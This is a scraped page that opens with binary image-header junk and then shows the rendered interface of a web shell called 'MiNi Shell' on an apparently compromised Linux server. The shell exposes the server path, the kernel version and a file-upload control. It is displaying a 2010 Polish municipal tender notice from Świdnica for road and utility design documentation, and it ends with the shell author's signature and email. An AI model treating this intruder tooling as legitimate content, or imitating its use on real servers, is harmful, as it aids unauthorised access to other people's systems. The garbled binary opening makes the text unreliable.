JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101006/320302-N-2010.html

<p class="kh_header"><b>Świdnica: Wykonania dokumentacji projektowej i kosztorysowej dla zadania pn.:

 Zagospodarowanie rejonu ulic Bystrzycka - Westerplatte w Świdnicy

- budowa dróg oraz sieci infrastruktury podziemnej.</b><br>
<b>Numer ogłoszenia: 320302 - 2010; data zamieszczenia: 06.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonania dokumentacji projektowej i kosztorysowej dla zadania pn.:

 Zagospodarowanie rejonu ulic Bystrzycka - Westerplatte w Świdnicy

- budowa dróg oraz sieci infrastruktury podziemnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie obejmuje obszar przeznaczony w Miejskim Planie Zagospodarowania Przestrzennego 
pod zabudowę mieszkalno - usługową w rejonie ulic Bystrzycka - Westerplatte ograniczony od wschodu ul. Westerplatte, od północy ul. Kasztanową, od zachodu ul. Bystrzycką, od południa ul. Bystrzycką 
i granicą administracyjną miasta. 

4.3. Przedmiot i cel zamówienia:

Przedmiotem zamówienia jest opracowanie kompletnej i pełnobranżowej dokumentacji:
projektu budowlanego i wykonawczego, kosztorysu inwestorskiego, przedmiaru robót
oraz uzyskania wszelkich niezbędnych opinii, uzgodnień, pozwoleń, wraz z uzyskaniem pozwolenia na budowę. 
Zakres prac projektowych obejmuje wykonanie pełnobranżowego projektu budowlanego i wykonawcze-go dla przedmiotowej inwestycji wraz z kosztorysami, podziałem na etapy, zbiorczym zestawieniem kosztów, zapewnieniami, technicznymi warunkami przyłączenia do sieci, uzgodnieniami, pozwoleniem na budowę.
Zakres prac obejmuje również wykonanie matrycy lewostronnej do celów projektowych (aktualizacja) oraz badań geologicznych (geotechnicznych) zgodnie z obowiązującymi przepisami obejmującymi wy-konanie wierceń w ilości niezbędnej zapewniającej prawidłową ocenę podłoża o głębokości min. 3,0 m na trasie planowanych ciągów komunikacyjnych. Opracowanie geologiczne winno zawierać dokumenta-cję geologiczną określającą warunki gruntowo - wodne podłoża pod względem posadowienia planowa-nych ciągów komunikacyjnych oraz uzbrojenia podziemnego, analizę agresywności środowiska grunto-wo - wodnego na przewidywane obiekty budowlane układane w gruncie, tj. np. sieci uzbrojenia pod-ziemnego, oraz planowane do budowy obiekty kubaturowe.

4.4.1. Zakres prac projektowych obejmuje następujące tereny zgodnie z oznaczeniami Miejscowego 
planu zagospodarowania przestrzennego:

a) Funkcja komunikacyjna:
- 1KD(Z) - teren drogi publicznej - ulica zbiorcza, szerokość w liniach rozgraniczających 35m, 
szerokość jezdni zgodnie z warunkami technicznymi dróg;
- 2KD(Z) - teren drogi publicznej - ulica zbiorcza, szerokość w liniach rozgraniczających 25m, szerokość jezdni zgodnie z warunkami technicznymi dróg;
- 3KD(Z) - teren drogi publicznej - ulica zbiorcza, szerokość w liniach rozgraniczających 
minimum 20m, minimalna szerokość jezdni - 7m;
- 1KD(L) - teren drogi publicznej - ulica lokalna, szerokość w liniach rozgraniczających mini-mum 25m, minimalna szerokość jezdni - 7m, obowiązuje dwukierunkowa droga rowerowa;
- 2KD(L) - teren drogi publicznej - ulica lokalna, szerokość w liniach rozgraniczających 
minimum 25m, minimalna szerokość jezdni - 7m;
- 1KD(D), 2KD(D) - tereny dróg publicznych - ulice dojazdowe, szerokość w liniach rozgrani-czających minimum 10m, minimalna szerokość jezdni - 6m;
- 3KD(D) - teren drogi publicznej - ulica dojazdowa, szerokość w liniach rozgraniczających 
minimum 12m, minimalna szerokość jezdni - 6m;
- 4KD(D), 5KD(D), 6KD(D), 7KD(D), 8KD(D) - tereny dróg publicznych - ulice dojazdowe, 
szerokość w liniach rozgraniczających minimum 10 m, minimalna szerokość jezdni - 6m;
- 9KD(D) - teren drogi publicznej - ulica dojazdowa, szerokość w liniach rozgraniczających 
minimum 15m, szerokość jezdni zgodnie z warunkami technicznymi dróg;
- 10KD(D) - teren drogi publicznej - ulica dojazdowa, szerokość w liniach rozgraniczających 
minimum 20m, minimalna szerokość jezdni - 7m;
- 2KDW, 3KDW, 4KDW, 5KDW, 6KDW, 7KDW - tereny dróg wewnętrznych, szerokość w 
liniach rozgraniczających minimum 12m, minimalna szerokość jezdni - 6m;
- 1KPJ, 2KPJ, 3KPJ, 4KPJ, 5KPJ, 1KP, 2KP - tereny ciągów pieszo - jezdnych, szerokość w 
liniach rozgraniczających minimum 6m.

b) Infrastruktura techniczna:
- sieć wodociągowa rozdzielcza w układzie pierścieniowym z włączeniami do istniejących 
sieci w ul. Westerplatte i Bystrzyckiej zgodnie z warunkami technicznymi wydanymi przez właściciela sieci, wypusty przyłączy wodociągowych wyprowadzić do granicy działek gruntu objętych opracowaniem;
- sieć kanalizacji sanitarnej odprowadzającej ścieki z terenów objętych zainwestowaniem 
z włączeniem do kolektora w ul. Towarowej na wysokości skrzyżowania z ul. Kasztanową oraz zgodnie z warunkami technicznymi wydanymi przez właściciela sieci, wypusty przyłą-czy kanalizacji sanitarnej wyprowadzić do granicy działek gruntu objętych opracowaniem zakończyć studnią;
- sieć kanalizacji deszczowej obsługującej obszary zainwestowania spełniająca funkcję 
odwodnienia nawierzchni dróg, placów, parkingów oraz posesji, wypusty kanalizacji desz-czowej na teren działek gruntu objętych opracowaniem zakończyć studnią;
- sieć energetyczna oświetleniowa obsługująca obszar zainwestowania zgodnie z wydanymi 
warunkami.

c) Tereny funkcjonalne objęte opracowaniem projektowym:
- 1KS - parkingi terenowe i miejsca postojowe;
- 1U - tereny zabudowy usługowej;
- 1MW ÷ 4MW - tereny zabudowy mieszkaniowej wielorodzinnej;
- 1MWU ÷ 3MWU - tereny zabudowy mieszkaniowej wielorodzinnej z usługami;
- 1MS, 2MS - tereny zabudowy mieszkaniowej średniej intensywności;
- 1MN ÷ 13MN - tereny zabudowy mieszkaniowej jednorodzinnej;
- 1MNU, 2MNU - tereny zabudowy mieszkaniowej jednorodzinnej z usługami;
- 1AG - tereny aktywizacji gospodarczej;
- 1AG/MN, 2AG/MN - tereny aktywizacji gospodarczej z dopuszczeniem zabudowy mieszka-niowej jednorodzinnej.

4.4.2. Przedmiot umowy obejmuje w szczególności:

Opracowanie pełnobranżowego projektu budowlanego i wykonawczego (zgodnie z Rozporządzeniem Ministra Infrastruktury z 03.07.2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego Dz.U.03.120.1133 z późn. zmianami) w zakresie uwzględniającym specyfikę robót budowlanych wy-mienionych poniżej i zawierającego podział na poszczególne etapy robót, oraz uzyskanie pozwolenia na budowę.

Przy opracowywaniu dokumentacji projektowej należy uwzględnić zapisy:
 Miejscowego Planu Zagospodarowania Przestrzennego, a w szczególności zapisy Uchwały 
nr XLV/540/10 Rady Miejskiej w Świdnicy z dnia 14 maj 2010r. w sprawie uchwalenia zmiany miejscowego planu zagospodarowania przestrzennego obszaru zabudowy mieszkaniowo - usługowej Westerplatte - Bystrzycka w Świdnicy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających, o których mowa w art.67 ust.1 pkt.1.b), pkt. 5, 6 i 7 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.21.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> . Oferent pod rygorem nieważności oferty wnosi wadium w wysokości: 4 000, - PLN (słownie: cztery tysiące złotych).
2. Wadium wnosi się przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) w zakresie posiadania uprawnień do wykonywania określonej działalności: 
Wykonawca wykaże, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Ocena zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się opracowaniem, co najmniej dwóch projektów budowlanych i dwóch projek-tów wykonawczych 1 dla przedsięwzięć tożsamych z przedmiotem zamówienia zrealizowanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeśli okres prowadzenia działalno-ści jest krótszy - w tym okresie, z podaniem wartości robót 2, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających 3, że usługi te zostały wykonane należycie.
Wyjaśnienia do indeksów 1,2 i 3:
1 Projekt budowlany i wykonawczy dla przedsięwzięć tożsamych z przedmiotem zamówienia to kom-pleksowe opracowanie dla jednego tematu inwestycyjnego zawierające w swoim wykazie łącznie: pro-jekt branży drogowej, projekt branży sanitarnej (kanalizacji sanitarnej lub deszczowej lub ogólno-spławnej), projekt sieci wodociągowej, projekt branży elektroenergetycznej obejmujący w swym za-kresie oświetlenie uliczne.
2 Wartość robót to wartość zrealizowanych robót wg. jednego projektu w oparciu o kosztorys inwestor-ski sporządzony do projektu wykonywanego przez oferenta, która winna być większa bądź równa 4 000 000 zł netto.
3 Dokumenty potwierdzające należyte wykonanie (np. protokoły odbioru dokumentacji projektowej, re-ferencje, kopie pozwolenia na budowę) należy zestawić w wykazie, który stanowi załącznik nr 4 do SIWZ. Załączone dokumenty muszą być oryginałami lub kopiami potwierdzonymi za zgodność z ory-ginałem przez Wykonawcę lub osoby reprezentujące go wraz ze stosowym upoważnieniem, powinny one zawierać i potwierdzać wszystkie dane wyszczególnione w kolejnych kolumnach 1÷5, 7 podanego wykazu


Ocena zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu za-mówienia wraz z informacjami o ich kwalifikacjach zawodowych, doświadczeniu i wykształceniu, nie-zbędnych do wykonania zamówienia, a także zakresie wykonywanych przez nich czynności, oraz in-formacją o podstawie do dysponowania tymi osobami;
Wykonawca dla udowodnienia powyższego warunku zobowiązany jest do wskazania zespołów projek-towych z osobami, które pełnić będą funkcję projektanta/ projektantów wiodących. W przypadku podania kilku projektantów wiodących wskazać należy dodatkowo projektanta odpowiadającego za koordynacją poszczególnych etapów prac projektu. 
Osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane Prawem Budowlanym uprawnienia do projektowania w specjalnościach wymaganych przez specyfikę przedmiotu zamówienia i tym samym umożliwiających wykonanie przedmiotu zamówienia. Osoby przewidziane do pełnienia funkcji projektantów posiadają uprawnienia budowlane do projektowania w odpowiednich specjalnościach:
- architektonicznej,
- konstrukcyjno-budowlanej,
- drogowej,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, 
wodociągowych i kanalizacyjnych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
     - oraz innych niezbędnych do kompleksowej realizacji zadania;


Ocena zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej 
działalności projektowej na sumę ubezpieczenia, co najmniej 200.000,00 zł.


Ocena zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty stwierdzające, że osoby przewidziane do pełnienia funkcji projektantów posiadają uprawnienia budowlane do projektowania w odpowiednich specjalnościach:
- architektonicznej;
- konstrukcyjno-budowlanej;
- drogowej;
 -instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
umożliwiające wykonanie przedmiotu zamówienia i niezbędne do uzyskania decyzji o pozwoleniu na budowę, tj.: kserokopie uprawnień wraz z aktualnym zaświadczeniem o przynależności do odpowiedniej izby zawodowej oraz ubezpieczeniu od odpowiedzialności cywilnej projektanta.

Dodatkowo Wykonawca winien do oferty dołączyć:

- zaparafowany projekt umowy - załącznik nr 12 do oferty,
- dowód wniesienia wadium - załącznik nr 1 do oferty,
- pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa - załącznik nr 13 do oferty,
- pełnomocnictwo do złożenia oferty lub złożenia oferty i podpisania umowy w przypadku, gdy Wykonawcy ubiegają się wspólnie o zamówienie, które podpiszą wszyscy Wykonawcy - załącznik nr 15 do oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. Zmiana umowy dotyczyć może:
a) zmiany wynikającej ze zmiany przepisów bądź wymogów szczególnych dotyczących inwestycji objętych przedmiotem zamówienia, w tym przepisów i wymogów stawianych dokumentom przez instytucje opiniodawcze i uzgadniające,
b) zmiany terminu wykonania prac projektowych; związanych ze zmianą zakresu prac (przedmiotu zamówienia) jw. Lub z przyczyn nie leżących po stronie Wykonawcy,
c) zmiany kluczowego personelu Wykonawcy,
d) zmiany podwykonawców,
e) zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com